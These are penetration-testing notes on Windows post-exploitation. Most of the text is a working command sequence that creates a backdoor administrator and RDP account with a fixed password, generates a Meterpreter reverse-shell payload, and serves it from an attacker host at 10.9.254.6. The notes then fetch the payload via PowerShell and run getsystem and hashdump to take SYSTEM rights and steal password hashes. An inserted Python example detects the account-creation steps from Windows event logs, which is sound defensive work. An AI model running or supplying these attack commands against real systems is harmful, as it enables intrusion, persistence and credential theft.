Add RDP Account & Ride on Meterpreter

With an initial foothold

Remote Desktop

net user pentest Pen.TE$t2024!1 /ADD
net localgroup "Remote Desktop Users" pentest /add
net localgroup "Administrators" pentest /add
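
The three commands above leave a recognisable trail in the Windows Security log when account-management auditing is enabled: event 4720 (account created) followed by event 4732 (member added to a local group) for the same account. The Python below is an added detection example, not part of the original notes, that correlates those events over constructed, pre-parsed records; the record field names, hosts, SIDs other than the built-in group SIDs, and the 10-minute window are assumptions.

```python
from datetime import datetime, timedelta

# Well-known SIDs of the built-in local groups the commands above modify.
WATCHED_GROUPS = {"S-1-5-32-544": "Administrators",
                  "S-1-5-32-555": "Remote Desktop Users"}
WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per site

NEW = "S-1-5-21-1111-2222-3333-1105"  # constructed SID of the new account
OLD = "S-1-5-21-1111-2222-3333-1001"  # constructed SID of an existing account

# Constructed, pre-parsed Security log records. Field names are this
# example's own. 4720 = account created, 4732 = member added to local group.
EVENTS = [
    {"time": "2024-05-01T10:00:01", "id": 4720, "host": "WS01",
     "account_sid": NEW, "account_name": "pentest", "actor": "jdoe"},
    {"time": "2024-05-01T10:00:01", "id": 4732, "host": "WS01",
     "account_sid": NEW, "group_sid": "S-1-5-32-545"},  # Users: not watched
    {"time": "2024-05-01T10:00:05", "id": 4732, "host": "WS01",
     "account_sid": NEW, "group_sid": "S-1-5-32-555"},
    {"time": "2024-05-01T10:00:09", "id": 4732, "host": "WS01",
     "account_sid": NEW, "group_sid": "S-1-5-32-544"},
    {"time": "2024-05-01T11:30:00", "id": 4732, "host": "WS02",
     "account_sid": OLD, "group_sid": "S-1-5-32-544"},  # no 4720 seen
]


def find_new_privileged_accounts(events, window=WINDOW):
    """Accounts created (4720) and, within `window` on the same host,
    added (4732) to a watched local group."""
    created, hits = {}, {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        key = (ev["host"], ev["account_sid"])
        if ev["id"] == 4720:
            created[key] = (ts, ev["account_name"], ev["actor"])
        elif ev["id"] == 4732 and ev["group_sid"] in WATCHED_GROUPS:
            if key in created and ts - created[key][0] <= window:
                _, name, actor = created[key]
                hit = hits.setdefault(key, {"host": ev["host"], "account": name,
                                            "created_by": actor, "groups": []})
                hit["groups"].append(WATCHED_GROUPS[ev["group_sid"]])
    return list(hits.values())


if __name__ == "__main__":
    for finding in find_new_privileged_accounts(EVENTS):
        print(finding)
```

The WS02 record is not reported because no account creation precedes it; adding an existing account to Administrators needs its own rule.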

Meterpreter

Payload generation

https://www.offsec.com/metasploit-unleashed/generating-payloads/

use payload/windows/meterpreter/reverse_tcp
set lhost 10.9.254.6
set lport 8888
generate -f exe -o /var/www/html/meterpreter.exe

Metasploit listener for meterpreter payload

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.254.6
set lport 8888
run

Transfer meterpreter.exe

apache2ctl start

Connect to the victim via RDP and start PowerShell

$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"

Invoke-WebRequest -URI $URL -OutFile $Path

Run meterpreter.exe

Start meterpreter.exe "As Administrator"

Getsystem & hashdump

meterpreter> getsystem
meterpreter> hashdump
